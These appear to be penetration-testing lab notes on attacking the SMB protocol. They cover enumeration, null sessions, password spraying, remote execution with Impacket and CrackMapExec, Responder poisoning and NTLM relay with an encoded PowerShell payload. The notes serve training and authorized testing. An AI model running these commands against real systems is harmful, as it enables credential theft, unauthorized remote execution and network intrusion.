Attacking SMB
Overview
- Server Message Block (SMB) is a communication protocol for providing shared access to files and printers across nodes on a network.
- Originally designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138.
- Windows 2000+ can run SMB directly over TCP/IP on port 445 without the NetBIOS layer.
- Modern Windows uses SMB over TCP but supports NetBIOS as a failover.
- Samba is a Unix/Linux open-source implementation of SMB, allowing Linux/Unix servers and Windows clients to use the same SMB services.
Port Summary
| Port | Protocol | Description |
|---|---|---|
| 139/TCP | NetBIOS-SSN | SMB over NetBIOS |
| 445/TCP | Microsoft-DS | SMB over TCP/IP |
| 137/UDP | NetBIOS-NS | NetBIOS Name Service |
| 138/UDP | NetBIOS-DGM | NetBIOS Datagram |
Related Protocols
- MSRPC (Microsoft Remote Procedure Call): Provides a generic way to execute procedures in local or remote processes. RPC over SMB can use named pipes as its underlying transport.
Enumeration
Nmap Scanning
sudo nmap 10.129.14.128 -sV -sC -p139,445
Key information from scans:
- SMB version (e.g., Samba smbd 4.6.2)
- Hostname
- Operating system (inferred from SMB implementation)
- Message signing status
Misconfigurations
Null Session / Anonymous Authentication
- SMB can be configured to not require authentication.
- Allows access to shares, usernames, groups, permissions, policies, and services without credentials.
Tools supporting null session:
smbclientsmbmaprpcclientenum4linux
Listing Shares with smbclient
smbclient -L //10.10.11.45 -N
-L: List shares-N: Use null session (no password)
Protocol-Specific Attacks
Brute Forcing vs Password Spraying
- Brute Forcing: Try many passwords against one account. Risk of lockout.
- Password Spraying: Try one password against many accounts. Safer approach.
- Recommended: 2-3 attempts with 30-60 minute waits between attempts.
Password Spraying with CrackMapExec
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
Flags:
--continue-on-success: Continue spraying after valid login found--local-auth: Required for non-domain joined computers
Windows SMB Attack Capabilities
With admin or privileged access:
- Remote Command Execution
- Extract Hashes from SAM Database
- Enumerate Logged-on Users
- Pass-the-Hash (PTH)
Remote Code Execution (RCE)
PsExec
- Executes processes on remote systems with full console interactivity.
- Deploys a Windows service to admin$ share on the remote machine.
- Uses DCE/RPC interface over SMB to access Windows Service Control Manager API.
Impacket Tools
- impacket-psexec: Python PsExec using RemComSvc
- impacket-smbexec: Similar to PsExec without RemComSvc, uses local SMB server for output
- impacket-atexec: Executes commands through Task Scheduler service
Using impacket-psexec
impacket-psexec administrator:'Password123!'@10.10.110.17
CrackMapExec Command Execution
# CMD command
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
# PowerShell command
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -X 'Get-Process'
Note: If --exec-method is not defined, CME tries atexec first, then smbexec.
Enumerating Logged-on Users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Credential Capture with Responder
LLMNR/NBT-NS Poisoning
When a host canโt resolve a name through DNS, it falls back to:
- Local hosts file
- Local DNS cache
- Configured DNS server
- Multicast query (LLMNR/NBT-NS)
Attackers can poison these multicast queries to capture credentials.
Running Responder
sudo responder -I ens33
Responder can poison:
- LLMNR
- NBT-NS
- DNS/MDNS
NTLM Relay Attacks
Using impacket-ntlmrelayx
# Dump SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
# Execute command
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <BASE64_PAYLOAD>'
Use https://www.revshells.com/ to generate reverse shell payloads.
RPC Attacks
Beyond enumeration, RPC can be used to:
- Change user passwords
- Create new domain users
- Create new shared folders
Tools:
rpcclient
Tools Summary
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| smbclient | SMB share interaction |
| smbmap | SMB share enumeration |
| enum4linux | SMB enumeration |
| rpcclient | RPC enumeration and interaction |
| crackmapexec | Password spraying, command execution, enumeration |
| impacket-psexec | Remote command execution |
| impacket-smbexec | Remote command execution |
| impacket-atexec | Remote command execution via Task Scheduler |
| responder | LLMNR/NBT-NS poisoning |
| impacket-ntlmrelayx | NTLM relay attacks |